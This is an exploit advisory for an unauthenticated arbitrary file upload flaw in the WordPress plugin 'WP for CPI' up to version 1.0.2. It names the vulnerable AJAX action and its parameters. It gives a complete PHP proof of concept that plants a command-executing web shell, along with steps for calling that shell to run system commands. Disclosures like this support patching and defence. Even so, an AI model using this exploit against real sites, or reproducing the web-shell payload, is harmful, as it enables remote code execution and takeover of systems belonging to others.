📄 WordPress WP for CPI 1.0.2 Shell Upload

=============================================================================================================================================
    | # Title     : WP for CPI 1.0.2 Unauthenticated Arbitrary File Upload                                                                      |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |
    | # Vendor    : https://discover.commoninja.com/wordpress/plugin/cpi-wp-migration                                                           |
    =============================================================================================================================================
    
    [+] Summary : 
    
    The WordPress plugin "WP for CPI" versions <= 1.0.2 suffer from an
    unauthenticated arbitrary file upload vulnerability via the "cpiwm_import"
    AJAX action. An attacker can upload arbitrary PHP files and achieve
    remote code execution.
    
    The vulnerable endpoint requires no authentication, nonce, or capability
    checks.
    
    Affected endpoint:
        /wp-admin/admin-ajax.php?action=cpiwm_import
    
    
    2. Fake Python PoC Notice
    -------------------------
    
    [+] References : https://packetstorm.news/files/id/211558/ CVE-2025-11170
    
    A previously circulating Python PoC was analyzed and confirmed to be
    non-functional, incorrect, and not aligned with the plugin’s real
    behavior. The script was determined to be fake and technically invalid.
    
    A corrected analysis and working PoC are provided below.
    
    
    3. Technical Details
    --------------------
    
    The plugin exposes the action parameter:
    
        action=cpiwm_import
    
    The server accepts the following POST parameters:
    
        filename   - the resulting file name on disk
        data       - base64 encoded file contents
        index      - import index (not validated)
    
    Uploaded files are saved to:
    
        /wp-content/plugins/cpi-wp-migration/storage/{filename}
    
    A successful upload returns the response:
    
        0
    
    
    4. Working PoC (PHP)
    ---------------------
    
    <?php
    /*
       Corrected PoC for CVE-2025-11170
       By Indoushka
    */
    
    $target = "http://target.com"; // no trailing slash
    $ajax   = $target . "/wp-admin/admin-ajax.php";
    
    $filename = "indoushka.php";
    $payload  = "<?php system(\$_GET['cmd']); ?>";
    $data_b64 = base64_encode($payload);
    
    $post = [
        "action"   => "cpiwm_import",
        "filename" => $filename,
        "data"     => $data_b64,
        "index"    => "0"
    ];
    
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $ajax);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $response = curl_exec($ch);
    curl_close($ch);
    
    echo "Server Response: $response\n";
    
    if(trim($response) === "0"){
        echo "[+] Upload Successful!\n";
        echo "Shell Path:\n";
        echo $target . "/wp-content/plugins/cpi-wp-migration/storage/" . $filename . "\n";
    } else {
        echo "[!] Upload failed.\n";
    }
    ?>
    
    
    5. Usage Instructions
    ----------------------
    
    Save the file:
    
        poc.php
    
    Run:
    
        php poc.php
    
    Access your shell:
    
        http://target.com/wp-content/plugins/cpi-wp-migration/storage/indoushka.php?cmd=id
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================